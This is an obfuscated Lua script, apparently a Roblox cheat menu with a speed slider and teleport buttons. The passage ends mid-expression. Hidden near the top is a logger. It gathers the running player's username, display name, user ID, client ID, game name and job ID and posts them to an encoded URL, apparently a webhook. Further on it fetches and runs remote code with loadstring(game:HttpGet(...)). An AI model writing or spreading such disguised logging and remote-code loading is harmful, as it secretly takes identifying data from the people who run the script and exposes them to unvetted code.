--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v45,v46) local v47={};for v211=1, #v45 do v6(v47,v0(v4(v1(v2(v45,v211,v211 + 1 )),v1(v2(v46,1 + (v211% #v46) ,1 + (v211% #v46) + 1 )))%256 ));end return v5(v47);end local v8="";local v9={[v7("\221\204\220\13\209\146\227","\126\177\163\187\69\134\219\167")]=true,[v7("\47\194\45\240\239\38\223","\156\67\173\74\165")]=true,[v7("\56\184\78\49\189\43\67","\38\84\215\41\118\220\70")]=true,[v7("\92\25\37\56\241\82\63\6","\158\48\118\66\114")]=true};if ((v8=="") or (v8==v7("\173\37\28\37\118","\155\203\68\112\86\19\197"))) then local v212=(411 -(303 + 3 + 37 + 68)) + (0 -0) ;while true do if (v212==((0 -0) -(433 -(114 + 319)))) then local v232=0;local v233;while true do if ((0 -0)==v232) then v233=0 -0 ;while true do if (v233==(0 + 0)) then v9.logHWID=true;v9.logUser=true;v233=1 -0 ;end if (v233==1) then v212=((2585 -1351) -((2129 -(556 + 1407)) + 261)) -(((1831 -(741 + 465)) -((754 -(170 + 295)) + 115 + 103)) + 688) ;break;end end break;end end end if (v212==(1 + 0)) then v9.logGame=true;v9.logJobID=true;break;end end end local v10=game:GetService(v7("\118\209\55\229\69\106\246","\152\38\189\86\156\32\24\133"));local v11=game:GetService(v7("\212\67\179\86\207\82\181\80\245\84\162","\38\156\55\199"));local v12=game:GetService(v7("\133\124\110\35\22\96\234\79\169\126\121\27\22\102\236\74\171\120","\35\200\29\28\72\115\20\154"));local v13=game:GetService(v7("\43\189\201\254\131\45\56\0\171\216\220\158\31\49\11\169\216\220\136","\84\121\223\177\191\237\76"));local v14=v10.LocalPlayer;local v15={[v7("\172\83\203\168\53\95\59\210","\161\219\54\169\192\90\48\80")]={},[v7("\89\67\25\41\70\67\4","\69\41\34\96")]={[v7("\191\204\217\30\7\37\168","\75\220\163\183\106\98")]="",[v7("\7\183\137\50\221\17","\185\98\218\235\87")]={}}};v15.Send=function(v48,v49) local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;while true do if (v50==1) then v53=nil;v54=nil;v50=2;end if (v50==(2 + 0)) then v55=nil;while true do if (v51==(1 + 0 + 0)) then local v239=0 + 0 ;while true do if (v239==(0 + 0)) then v53=(syn and syn.request) or request or http_request ;if  not v53 then warn(v7("\229\51\103\229\209\167\219\61\51\239\220\166\206\124\15\210\234\154\139\46\34\247\203\175\216\40\103\224\203\164\200\40\46\233\208\234\205\51\50\232\218\228","\202\171\92\71\134\190"));return;end v239=1231 -(957 + 273) ;end if (v239==1) then v51=((7 + 18) -(8 + 10)) -5 ;break;end end end if (v51==(7 -5)) then v54,v55=pcall(function() return v53({[v7("\28\211\32","\232\73\161\76")]=v52,[v7("\150\220\86\85\17\191","\126\219\185\34\61")]=v7("\60\225\109\70","\135\108\174\62\18\30\23\147"),[v7("\158\236\43\207\29\188\32","\167\214\137\74\171\120\206\83")]={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]=v7("\6\6\169\39\14\21\184\63\14\25\183\100\13\5\182\37","\75\103\118\217")},[v7("\229\91\116\13","\126\167\52\16\116\217")]=v11:JSONEncode(v48.payload)});end);if  not v54 then warn(v7("\238\47\41\140\177\29\188\220\33\96\147\177\23\248\136\57\37\130\188\22\243\195\116\96","\156\168\78\64\224\212\121")   .. tostring(v55) );end break;end if ((((0 -0) -(0 -0)) -((4253 -3394) -(814 + 45)))==v51) then local v240=1780 -(389 + 1391) ;local v241;while true do if (v240==(0 + 0)) then v241=(0 + 0) -0 ;while true do if (v241==((0 -0) + (951 -(783 + 168)))) then local v286=0;while true do if (v286==1) then v241=(3 -2) + 0 + 0 ;break;end if (v286==(311 -(309 + 2))) then v52=v48.webhooks[v49];if  not v52 then return;end v286=2 -1 ;end end end if (v241==((2098 -(1090 + 122)) -(261 + 203 + 421))) then v51=(3 -2) + 0 ;break;end end break;end end end end break;end if (v50==(0 + 0)) then v51=((2462 -(628 + 490)) -(1213 + 24 + 107)) + 0 + 0 ;v52=nil;v50=2 -1 ;end end end;v15.AddWebhook=function(v56,v57,v58) v56.webhooks[v57]=v58;end;v15.CreateEmbed=function(v60) local v61=0 -(0 -0) ;local v62;local v63;while true do if (v61==((1854 -(431 + 343)) -((2060 -1040) + (173 -113)))) then local v222=0 + 0 ;while true do if (v222==(1 + 0)) then v61=(1699 -(556 + 1139)) -(18 -(6 + 9)) ;break;end if (v222==0) then v62=((261 + 1162) -(323 + 307 + 793)) -((169 -(28 + 141)) -0) ;v63=nil;v222=1 + 0 ;end end end if (v61==(1 -0)) then while true do local v236=0 + 0 + (1317 -(486 + 831)) ;while true do if (((0 -0) -(0 -0))==v236) then if (v62==((1754 -(144 + 616 + (3120 -2133))) -(1918 -((3052 -(668 + 595)) + 112 + 12)))) then local v263=0;while true do if ((0 + 0)==v263) then v63.AddField=function(v292,v293,v294,v295) table.insert(v292.fields,{[v7("\9\239\168\203","\174\103\142\197")]=v293,[v7("\64\41\83\45\32","\152\54\72\63\88\69\62")]=v294,[v7("\221\202\226\85\218\193","\60\180\164\142")]=v295 or false });end;v63.SetThumbnail=function(v296,v297) v296.thumbnail={[v7("\77\76\9","\114\56\62\101\73\71\141")]=v297};end;v263=2 -1 ;end if (v263==1) then v62=3;break;end end end if (v62==((1056 -(23 + 267)) -(745 + 21))) then local v264=1944 -(1129 + 815) ;local v265;while true do if (v264==(387 -(371 + 16))) then v265=1750 -(1326 + 424) ;while true do if (v265==(1 + 0)) then v62=((3817 -1801) -(4688 -3405)) -(((180 -(88 + 30)) -(817 -(720 + 51))) + (13 -7) + 710) ;break;end if (v265==0) then v63={[v7("\190\224\222\200\188\250","\164\216\137\187")]={}};v63.SetTitle=function(v307,v308) v307.title=v308;end;v265=(1777 -(421 + 1355)) + (0 -0) ;end end break;end end end v236=(519 + 537) -((1170 -(286 + 797)) + (3538 -2570)) ;end if (v236==(1 -0)) then if (v62==((447 -(397 + 42)) -((7 + 15) -(817 -(24 + 776))))) then local v266=(0 -0) + 0 ;while true do if (v266==((785 -(222 + 563)) -0)) then v63.Save=function(v299) table.insert(v15.payload.embeds,v299);end;return v63;end end end if (v62==(1 + (0 -0))) then local v267=0;while true do if (v267==((1019 + 395) -((637 -(23 + 167)) + (2764 -(690 + 1108))))) then v62=(2 + 3) -(3 + 0) ;break;end if (v267==(0 -(848 -(40 + 808)))) then local v290=0;while true do if (v290==(0 + 0)) then v63.SetDescription=function(v310,v311) v310.description=v311;end;v63.SetColor=function(v313,v314) v313.color=tonumber(v314,61 -45 );end;v290=1;end if ((1 + 0)==v290) then v267=1818 -(1703 + 61 + 53) ;break;end end end end end break;end end end break;end end end;v15:AddWebhook(v7("\198\244\48\177\173\251\25","\107\178\134\81\210\198\158"),v7("\48\26\150\214\185\98\65\205\194\163\43\13\141\212\174\118\13\141\203\229\57\30\139\137\189\61\12\138\201\165\51\29\205\151\249\106\93\219\151\253\110\91\208\148\248\109\90\208\159\255\110\90\205\224\176\34\43\151\241\144\111\92\145\207\140\96\25\137\158\255\31\58\146\196\157\107\31\150\252\190\33\93\140\192\142\44\40\211\214\149\15\26\186\206\142\9\10\155\194\146\59\63\151\254\253\96\88\133\228\149\58\9\132\242\142\12\86\150\206\134\61","\202\88\110\226\166"));local function v19() local v64=0;local v65;local v66;local v67;local v68;while true do if (v64==2) then while true do if (v65==(1 + 0)) then v68=nil;while true do if (v66==(0 -((571 -(47 + 524)) -(0 + 0)))) then local v268=(0 -0) -(0 -0) ;while true do if (v268==((0 -0) + (1726 -(1165 + 561)))) then local v291=0;while true do if (v291==0) then v67,v68=pcall(function() local v316=0;local v317;local v318;local v319;while true do if (v316==(1 + 0)) then v319=nil;while true do if (v317==1) then return v319.data[1 + ((0 -0) -(0 + 0)) ].imageUrl;end if (v317==(479 -(341 + 138))) then v318=game:HttpGet(v7("\203\27\150\231\217\153\64\205\227\194\214\2\128\249\203\202\3\145\185\216\204\13\142\248\210\141\12\141\250\133\213\94\205\226\217\198\29\145\184\203\213\14\150\246\216\142\7\135\246\206\208\7\141\227\149\214\28\135\229\227\199\28\223","\170\163\111\226\151")   .. v14.UserId   .. v7("\87\35\187\34\75\106\120\68\96\170\105\27\103\111\23\63\160\53\79\35\116\1\62\181\126\76\56\59\21\53\160\27\65\59\38\3\109\176\52\79\52\34","\73\113\80\210\88\46\87") );v319=v11:JSONDecode(v318);v317=1 + 0 ;end end break;end if (v316==(0 -0)) then v317=0;v318=nil;v316=327 -(89 + 237) ;end end end);return (v67 and v68) or nil ;end end end end end end break;end if ((14 -(9 + (16 -11)))==v65) then local v242=0;while true do if (v242==1) then v65=(2665 -1399) -(243 + (1903 -(581 + 300))) ;break;end if (v242==0) then v66=(1220 -(855 + 365)) -(376 -(85 + (691 -400))) ;v67=nil;v242=1 + 0 ;end end end end break;end if (v64==(1236 -(1030 + 205))) then v67=nil;v68=nil;v64=2;end if (0==v64) then local v223=0 + 0 ;while true do if (1==v223) then v64=1;break;end if (v223==0) then v65=(653 + 48) -((662 -(156 + 130)) + 325) ;v66=nil;v223=1;end end end end end local function v20() local v69=0 -0 ;local v70;while true do if (v69==(1 -0)) then return v70;end if ((0 -0)==v69) then v70=v7("\180\34\198\28\232\150\34","\135\225\76\173\114");pcall(function() v70=v13:GetClientId();end);v69=1 + 0 ;end end end local v21=v15:CreateEmbed();v21:SetTitle(v7("\70\183\233\227\254\233\246\76\181\236\225\251\233\255\67\184\224\228\254\232\254\64\188\235\226\248\236\241\66\185\233\231\248\229\254\79\181\236\226\249\228\249\90\241\248\131\175\175\174\10\249\248\149\180\184\164\15\249\177\191\162\253\131\31\249\189\179\184\184\163\90\241\248\236\246\236\244\72\185\233\230\244\233\246\77\185\224\233\249\229\243\72\184\225\234\253\238\245\78\188\238\232\248\236\240\78\181\225\229\244\233\245\79\180\230","\199\122\141\216\208\204\221"));v21:SetColor(v7("\250\143\72\169\92\215","\150\205\189\112\144\24"));if v9.logUser then local v213=0 -(0 + 0) ;while true do if (v213==((0 -(69 -(10 + 59))) + 0 + 0 + (0 -0))) then local v237=0;local v238;while true do if (v237==(1163 -(671 + 492))) then v238=(940 + 240) -((2338 -(369 + 846)) + 16 + 41) ;while true do if (v238==1) then v213=(734 + 126 + 196) -(((2286 -(1036 + 909)) -(130 + 33 + (152 -61))) + (2898 -(1869 + 61))) ;break;end if (((203 -(11 + 192)) + 0 + 0)==v238) then local v285=0;while true do if ((176 -(135 + 40))==v285) then v238=3 -(4 -2) ;break;end if (v285==(0 + 0)) then v21:AddField(v7("\121\222\238\31\86\220\64\70\125\208\237\28\93\208\66\68\113\215\234\25\84\210\64\67\119\208\238\26\92\220\67\64\124\220\236\24\80\219\68\69\117\218\255\80\68\172\24\3\53\136\190\85\68\166\16\29\32","\112\69\228\223\44\100\232\113"),v7("\212\31\7","\230\180\127\103\179\214\28")   .. v14.DisplayName   .. v7("\140\5\95","\128\236\101\63\38\132\33") ,true);v21:AddField(v7("\240\243\64\23\228\191\158\250\241\69\22\230\178\151\255\253\69\23\227\190\159\246\248\66\22\226\186\153\244\253\67\20\239\179\156\248\253\66\17\227\187\145\236\181\81\113\165\238\221\162\168\28\65","\175\204\201\113\36\214\139"),v7("\71\204\53","\100\39\172\85\188")   .. v14.Name   .. v7("\173\120\185","\83\205\24\217\224") ,true);v285=1;end end end end break;end end end if (v213==(((10 -5) -(1 -0)) -((177 -(50 + 126)) + (5 -3)))) then v21:AddField(v7("\214\215\194\59\239\201\200","\93\134\165\173"),v7("\133\209\205\203\57\197\242\118\187\224\196\255\114\198\166\106\174\225\155\141\117\220\189\124\178\253\217\140\57\193\191\49\171\225\196\208\41\129","\30\222\146\161\162\90\174\210")   .. v14.UserId   .. v7("\170\94\98\5\227\71\124\15\172","\106\133\46\16") ,false);break;end end end if v9.logHWID then v21:AddField(v7("\4\122\34\175\8\20\9\118\43\168\11\25\0\112\39\165\13\21\9\118\37\166\11\19\10\116\34\170\2\20\9\121\43\172\14\25\15\117\34\170\12\30\24\60\51\212\109\105\124","\32\56\64\19\156\58"),v7("\90\200\229","\224\58\168\133\54\58\146")   .. v20()   .. v7("\89\86\75","\107\57\54\43\157\21\230\231") ,true);end if v9.logGame then local v214=0 + 0 ;local v215;local v216;local v217;while true do if (v214==(1414 -(1233 + 180))) then v217=nil;while true do if (v215==((969 -(522 + 447)) + (1421 -(107 + 1314)))) then local v257=0 + 0 ;local v258;while true do if (v257==0) then v258=0 -0 ;while true do if (v258==0) then v216=((627 + 847) -(1329 + (287 -142))) + ((3841 -2870) -((2050 -(716 + 1194)) + 831)) ;v217=nil;v258=1 + 0 ;end if (1==v258) then v215=1851 -(151 + 1258 + (944 -(74 + 429))) ;break;end end break;end end end if (v215==(1 -0)) then while true do if (v216==(((356 + 362) -((34 -19) + 498 + 205)) -((0 -0) + (0 -0)))) then v217=v12:GetProductInfo(game.PlaceId);v21:AddField(v7("\135\209\64\166\235\136\158\141\211\69\164\239\137\155\130\210\66\166\233\133\152\129\218\66\167\237\141\153\131\223\64\163\236\136\150\130\216\66\165\224\139\145\155\151\81\210\184\209\202","\175\187\235\113\149\217\188"),v7("\60\175\129","\24\92\207\225\44\131\25")   .. v217.Name   .. v7("\75\211\184","\29\43\179\216\44\123") ,false);break;end end break;end end break;end if (v214==(433 -(279 + 154))) then v215=0 -(778 -(454 + 324)) ;v216=nil;v214=1 + 0 ;end end end if v9.logJobID then v21:AddField(v7("\225\131\113\31\239\141\113\26\229\141\113\20\232\137\120\21\238\136\113\26\233\131\113\31\239\141\113\26\229\141\113\20\232\137\120\21\238\136\113\26\233\135\96\80\253\243\47\78\253\240\4","\44\221\185\64"),v7("\1\231\72","\19\97\135\40\63")   .. game.JobId   .. v7("\174\92\51","\81\206\60\83\91\79") ,false);end local v22=v19();if v22 then v21:SetThumbnail(v22);end v21:Save();v15.payload.content=v7("\82\183\140\82\126\147\21\242\22\251\131\32\121\144\25\242\26\250\134\39\124\148\27\250\82\183","\196\46\203\176\18\79\163\45");v15:Send(v7("\172\48\127\29\47\254\253","\143\216\66\30\126\68\155"));local v24=game:GetService(v7("\152\221\3\248\192\177\193\232\169\205","\129\202\168\109\171\165\195\183"));local v25=game:GetService(v7("\16\93\39\212\215\23\231\54\93\51\235\202\27\244\35\95\50","\134\66\56\87\184\190\116"));local v10=game:GetService(v7("\12\61\8\162\28\249\50","\85\92\81\105\219\121\139\65"));local v26=v24:IsStudio();local v27;if v26 then v27=require(v25.ImGui);else local v218=17 -(12 + 5) ;local v219;local v220;local v221;while true do if (v218==1) then v221=nil;while true do if (v219==1) then while true do if (v220==0) then v221=v7("\245\167\68\85\111\133\178\252\87\76\104\215\232\177\30\70\115\210\178\183\85\85\104\215\238\188\31\119\115\221\241\188\72\8\85\210\218\134\121\10\110\222\234\252\93\68\117\209\178\154\93\98\105\214\179\191\69\68","\191\157\211\48\37\28");v27=loadstring(game:HttpGet(v221))();break;end end break;end if (v219==(0 + 0)) then local v259=0 -0 ;while true do if (v259==(0 + 0)) then v220=(1531 -(277 + 816)) -(262 + (751 -575)) ;v221=nil;v259=1184 -(1058 + 125) ;end if (v259==(1 + 0)) then v219=1;break;end end end end break;end if (v218==(975 -(815 + 160))) then v219=0 -0 ;v220=nil;v218=1;end end end local v28=v27:CreateWindow({[v7("\235\22\224\16\63","\90\191\127\148\124")]=v7("\76\143\43\87\84\142\40\3\56\214\96\68","\119\24\231\78"),[v7("\177\36\191\79","\113\226\77\197\42\188\32")]=UDim2.new((3134 -(345 + (3266 -1890))) -(((271 + 864) -((578 -380) + (2388 -(41 + 1857)))) + (2859 -(1222 + 671))) ,(7254 -(14504 -8892)) -(2499 -(2094 -637)) ,((2388 -(229 + 953)) -((2470 -(1111 + 663)) + (2089 -(874 + 705)))) + 0 + 0 ,2217 -(1162 + 541 + (236 -122)) ),[v7("\10\25\231\188\46\31\251\187","\213\90\118\148")]=UDim2.new(701.5 -((788 -412) + ((45 + 1542) -((1770 -(642 + 37)) + 39 + 132))) ,(0 + 0 + 0) -(0 -(0 -0)) ,(2430.5 -(2151 -(233 + 221))) -(((2508 -1423) -(123 + 251)) + 20 + 2) ,((1541 -(718 + 823)) -0) -((440 + 258) -((1013 -(266 + 539)) + 490)) )});v28:Center();local v29=v28:CreateTab({[v7("\117\47\185\83","\45\59\78\212\54")]=v7("\57\88\133\132","\144\112\54\227\235\230\78\205")});local v30=v28:CreateTab({[v7("\157\41\2\249","\59\211\72\111\156\176")]=v7("\99\136\245\40\67\130\237\57","\77\46\231\131")});local v31=v28:CreateTab({[v7("\148\85\187\69","\32\218\52\214")]=v7("\122\18\61\173\225\191\87\78\93","\58\46\119\81\200\145\208\37")});local v32=v28:CreateTab({[v7("\5\141\61\169","\86\75\236\80\204\201\221")]=v7("\83\69\122\140\240\152","\235\18\33\23\229\158")});local v33=v28:CreateTab({[v7("\126\187\204\190","\219\48\218\161")]=v7("\203\103\121\91\203\64\247\225\99\121\77","\128\132\17\28\41\187\47")});local v34=v28:CreateTab({[v7("\47\51\11\63","\61\97\82\102\90")]=v7("\137\29\155","\105\204\78\203\43\167\55\126")});local v35=v28:CreateTab({[v7("\139\171\46\27","\49\197\202\67\126\115\100\167")]=v7("\20\83\222\39\135\83\82\56\92","\62\87\59\191\73\224\54")});v29:Label({[v7("\211\7\226\221","\169\135\98\154")]=v7("\255\127\45\71\189\32\203\217\126\52\64\189\36\201\216\55\41\85\249\54\136\201\110\100\120\242\52\219\244\32\100\91\243\115\236\194\100\39\91\239\55\134","\168\171\23\68\52\157\83"),[v7("\192\116\237\185\18\63\134\228\97\240\169","\231\148\17\149\205\69\77")]=true});v29:Button({[v7("\180\162\223\239","\159\224\199\167\155\55")]=v7("\212\252\44\203\183\215\53\193\244\252\46\214\183\223\53\220\252","\178\151\147\92"),[v7("\175\252\64\62\16\77\121\135","\26\236\157\44\82\114\44")]=function(v71) if setclipboard then setclipboard(v7("\34\58\193\75\57\116\154\20\46\39\198\88\37\60\209\21\41\33\216\20\35\32\195\82\62\43\154\95\124\120\253\14\121\22\246\72\18","\59\74\78\181"));end end});local v36=1 + (0 -0) + 0 ;local v37=(1227 -(636 + 589)) -(2 -1) ;local v38=(7 + (16 -8)) -(((670 + 175) -(240 + 420 + 176)) + (1016 -(657 + 358)) + (10 -6)) ;local v39=true;local v40=(856.1 -480) -(((1474 -(1151 + 36)) -(14 + 188)) + ((933 + 33) -(141 + 393 + 141))) ;local v41=((1549 -1030) + 770) -(243 + (2737 -(1552 + 280)) + (951 -(64 + 770))) ;v30:Checkbox({[v7("\9\208\88\95\191","\211\69\177\58\58")]=v7("\146\235\120\247\229\206\247\198\95\231\232\198\178\165\74\229\236\206\179","\171\215\133\25\149\137"),[v7("\215\201\62\239\234","\34\129\168\82\154\143\80\156")]=v39,[v7("\166\179\63\7\74\79\138\142","\233\229\210\83\107\40\46")]=function(v72,v73) local v74=0 + 0 ;local v75;while true do if (v74==0) then v75=((3806 -2129) + 12 + 55) -((2824 -(2723 -(157 + 1086))) + ((1271 -636) -235)) ;while true do if (v75==((1773 -1368) -(((1096 -381) -460) + (204 -54)))) then v39=v73;if  not v39 then v38=(820 -(599 + 220)) + 0 ;end break;end end break;end end end});v30:Slider({[v7("\237\67\48\211\9","\101\161\34\82\182")]=v7("\219\29\92\251\223\162\175\59\228\25\80\238\215\235\135\60","\78\136\109\57\158\187\130\226"),[v7("\19\54\247\199\63\51\236\244","\145\94\95\153")]=v40,[v7("\208\204\12\227\79\187\232\200","\215\157\173\116\181\46")]=v41,[v7("\3\181\135\231\223","\186\85\212\235\146")]=v37,[v7("\240\142\3\240\61\231\86\197","\56\162\225\118\158\89\142")]=(3 -1) + (1931 -(1813 + 118)) ,[v7("\127\4\204\163\32\217\95\14","\184\60\101\160\207\66")]=function(v76,v77) if v39 then v38=v77;end end});local function v42(v78,v79,v80) return v78 + ((v79-v78) * math.min(v80,((291 + 106) -(115 + 281)) + ((1217 -(841 + 376)) -0) )) ;end local v43=v10.LocalPlayer;repeat wait();until game:IsLoaded() and v43.Character  local function v44() local v81=0 -0 ;local v82;local v83;local v84;local v85;while true do if ((1 + 1)==v81) then while true do if (v82==((2 -1) + (859 -(464 + 395)))) then v85=v83:WaitForChild(v7("\25\151\113\189\63\141\117\184","\220\81\226\28"));v24.RenderStepped:Connect(function(v260) local v261=0;local v262;while true do if (v261==(0 -0)) then v262=(0 + 0) -0 ;while true do if (v262==(0 + ((837 -(467 + 370)) -(0 -0)))) then v37=v42(v37,v38,v260 * (((43 + 15) -(143 -101)) -((137 + 741) -((1279 -729) + (837 -(150 + 370))))) );if (v85 and (v85.MoveDirection.Magnitude>(((2986 -(74 + 1208)) -(1288 -764)) -(((7479 -5902) -(324 + 130)) + ((549 -(14 + 376)) -102))))) then local v304=0 -0 ;local v305;local v306;while true do if (v304==1) then while true do if (v305==(0 -(0 + 0))) then v306=v85.MoveDirection;if v39 then local v321=0 + 0 ;local v322;local v323;while true do if (v321==1) then while true do if (v322==((2428 -498) -((7042 -(4934 + 239)) + (178 -117)))) then v323=v36 * v37 ;v84.CFrame=v84.CFrame + (v306 * v323 * v260) ;break;end end break;end if (v321==(0 + 0)) then v322=((2322 -(23 + 55)) -((1378 -796) + 940 + 468)) -(147 + 16 + ((488 -173) -224)) ;v323=nil;v321=1 + 0 ;end end else v84.CFrame=v84.CFrame + (v306 * v36 * v260) ;end break;end end break;end if (v304==(901 -(652 + 249))) then v305=(285 -((358 -224) + 151)) + ((3533 -(708 + 1160)) -((2633 -1663) + (1267 -572))) ;v306=nil;v304=28 -(10 + 17) ;end end end break;end end break;end end end);break;end if (v82==(0 + 0)) then local v243=1732 -(1400 + 332) ;while true do if (v243==1) then v82=1825 -((2292 -1097) + (2537 -(242 + 1666))) ;break;end if (v243==(0 + 0)) then v83=v43.Character;v84=v83:WaitForChild(v7("\59\192\143\250\228\200\26\209\176\244\229\211\35\212\144\239","\167\115\181\226\155\138"));v243=1 + 0 ;end end end end break;end if (0==v81) then local v224=0 + 0 ;local v225;while true do if (v224==(940 -(850 + 90))) then v225=0;while true do if (v225==(0 -0)) then v82=0;v83=nil;v225=1;end if (v225==(1391 -(360 + 1030))) then v81=1;break;end end break;end end end if (v81==1) then v84=nil;v85=nil;v81=2 + 0 ;end end end v43.CharacterAdded:Connect(v44);if v43.Character then v44();end v31:Label({[v7("\214\39\255\72","\166\130\66\135\60\27\17")]=v7("\105\75\197\112\112\87\95\220\112\112\93\69\219\53\36\81\88\192\53\23\75\78\227\122\52\65\10\193\123\112\77\68\142\90\38\65\88\222\122\39\65\88\203\113\112\112\75\204\53\50\65\76\193\103\53\4\83\193\96\112\81\89\203\53\4\65\70\203\101\63\86\94\221\52","\80\36\42\174\21")});v31:Button({[v7("\122\21\47\110","\26\46\112\87")]=v7("\141\43\174\52\147\182\67\160","\212\217\67\203\20\223\223\37"),[v7("\153\140\164\222\184\140\171\217","\178\218\237\200")]=function(v86) loadstring(game:HttpGet(v7("\190\161\242\192\165\239\169\159\177\188\245\196\248\178\239\196\190\160\228\197\165\176\244\211\185\187\242\213\184\161\168\211\185\184\169\241\166\167\233\215\185\166\171\209\176\190\169\211\179\179\227\212\225\229\229\135\239\229\182\133\178\231\181\134\178\225\191\137\178\179\224\214\180\236\191\210\238\176\176\159\164\180\241\159\231\182\179\129\176\182\224\137\225\229\190\135\227\179\179\212\239\177\228\132\180\236\224\128\183\183\180\130\176\179\177\132\227\182\176\129\238\224\224\213\249\129\227\220\179\165\233\194\162\240\180\133\228\229\242\223\243\231\179\130\230\153\239\214\162","\176\214\213\134")))();end});v31:Button({[v7("\192\168\174\192","\57\148\205\214\180\200\54")]=v7("\52\241\58\59\100\82\172","\22\114\157\85\84"),[v7("\231\202\31\200\95\247\171\207","\200\164\171\115\164\61\150")]=function(v87) local v88=0;local v89;while true do if (v88==0) then v89=0 -0 ;while true do if (v89==((0 -0) -(1661 -(909 + 752)))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((265.2398758 -((1410 -(109 + 1114)) + 54)) + 61),2842.8125 -(2815 -(162 + 618)) ,(122.07482099999999 + (94 -42)) -(40 + 8 + 12) ,0 + (0 -(242 -(6 + 236))) ,(213 + 124) -(10 + (549 -(179 + 43))) ,(2 -1) + 0 + ((2857 -1221) -(1373 + (1396 -(1076 + 57)))) ,(1000 -(75 + 376 + (1238 -(579 + 110)))) -(0 + 0) ,1 + 0 + 0 + 0 ,v7("\243\164","\227\222\148\99\37"), -(1475 -((2067 -738) + ((129 + 114) -(505 -(174 + 233))))),((6578 -4223) -((1309 -563) + 284 + 354)) -((1314 -(663 + 511)) + 280 + 33 + 113 + 405) ,(0 -(0 -0)) + 0 + 0 );wait();break;end end break;end end end});v31:Button({[v7("\7\87\74\226","\153\83\50\50\150")]=v7("\123\122\124\19\97\235\31","\45\61\22\19\124\19\203"),[v7("\226\19\1\249\0\113\186\202","\217\161\114\109\149\98\16")]=function(v90) local v91=0 -0 ;local v92;local v93;while true do if (v91==1) then while true do if (v92==0) then v93=((8305 -4874) -(733 + 802 + (89 -43))) -(998 + 402 + 1 + 8 + 441) ;while true do if (v93==((722 -(478 + 244)) + 0 + ((1077 -(440 + 77)) -(140 + 166 + (929 -675))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((1606.2398758 -(655 + 901)) + 140 + 613) -(12 + 3 + 475 + 228)),(6163.0625 -4633) -(2195 -(695 + 750)) ,((5190.074821 -3670) -(899 + (876 -308))) + 41 + (80 -60) ,((1410 -(285 + 66)) -621) -((610 -348) + (1486 -(682 + 628))) ,((375 + 1949) -(268 + (634 -(176 + 123)))) -(145 + 200 + ((1209 + 457) -((329 -(239 + 30)) + 230))) ,(573 -(116 + 310 + 141 + 5)) -((0 -0) + 0) ,((6688 -4544) -(282 + (1489 -(306 + 9)))) -((690 -492) + ((227 + 1074) -(569 + 242))) ,(11 -(5 + 2)) -3 ,v7("\95\112","\20\114\64\88\28\220"), -((1 + 0 + 1) -(2 -1)),(1024 -((2081 -(1140 + 235)) + 203 + 115)) -(0 + 0) ,((322 + 929) -(721 + (582 -(33 + 19)))) + ((459 + 812) -((2832 -1887) + 144 + 182)) );wait();break;end end break;end end break;end if (v91==(0 -0)) then v92=(320 + 21) -((907 -(586 + 103)) + 12 + 111) ;v93=nil;v91=1;end end end});v31:Button({[v7("\5\4\202\160","\221\81\97\178\212\152\176")]=v7("\235\235\18\244\8\141\180","\122\173\135\125\155"),[v7("\167\192\12\181\61\48\203\143","\168\228\161\96\217\95\81")]=function(v94) local v95=0 -0 ;local v96;while true do if ((1488 -(1309 + 179))==v95) then v96=((0 -0) -0) + 0 + 0 + 0 ;while true do if (v96==(((5118 -3212) -(205 + 66 + 429)) -((1359 -719) + 56 + (1016 -506)))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((830.2398757999999 -(295 + 314)) -((4018 -2382) -((3370 -(1300 + 662)) + (288 -196)))),(3331.3125 -(1178 + 577)) -(1910 -(240 + 221 + (1847 -1222))) ,((4069.074821 -(851 + 554)) -(879 + 114 + (818 -523))) -((123 -66) + (1336 -(115 + 187)) + 131 + 40) ,0 + 0 + ((4614 -3443) -(418 + 753)) ,(2328 -(160 + 1001)) -(246 + 350 + 49 + 38 + 16 + (957 -489)) ,(361 -(237 + 121)) -((898 -(525 + 372)) + 1) ,0 + (0 -0) ,530 -((1333 -927) + (265 -(96 + 46))) ,v7("\150\129","\55\187\177\78\60\79"), -((1772 -(1749 + (797 -(643 + 134)))) -(1 + 1)),(1696 -(451 + 798 + 73)) -(44 + (189 -110) + ((5182 -3786) -(466 + 652 + 27))) ,((0 -0) -(0 -0)) -(0 -(719 -(316 + 403))) );wait();break;end end break;end end end});v31:Button({[v7("\25\203\71\255","\224\77\174\63\139\38\175")]=v7("\162\77\87\33\150\1\12","\78\228\33\56"),[v7("\237\127\190\15\135\207\125\185","\229\174\30\210\99")]=function(v97) local v98=(1263 + 637) -((291 -185) + 1794) ;local v99;while true do if ((0 + 0)==v98) then v99=(64 + 113 + (1311 -790)) -(((435 + 178) -405) + (1326 -836)) ;while true do if (((114 -(2 + 2 + (381 -271))) + ((2789 -2205) -((118 -61) + 31 + 496)))==v99) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((3781.2398758 -1860) -(1045 + ((109 + 2109) -((120 -79) + (1403 -(12 + 5)))))),(1254.5625 -931) + ((1075 -571) -(17 + 86)) ,((1371.0748210000002 -726) + (756 -451)) -((1471 -(165 + 646)) + (2149 -(1656 + 317))) ,((0 + 0) -0) + 0 + 0 ,(441 -275) -((600 -478) + (398 -(5 + 349))) ,203 -(((109 -86) -(1280 -(266 + 1005))) + (623 -(287 + 148))) ,((1876 -1326) + 125) -((702 -168) + (1717 -(561 + 1135)) + (156 -36)) ,(877 -610) -(((1122 -(507 + 559)) -28) + ((760 -457) -((92 -62) + (423 -(212 + 176))))) 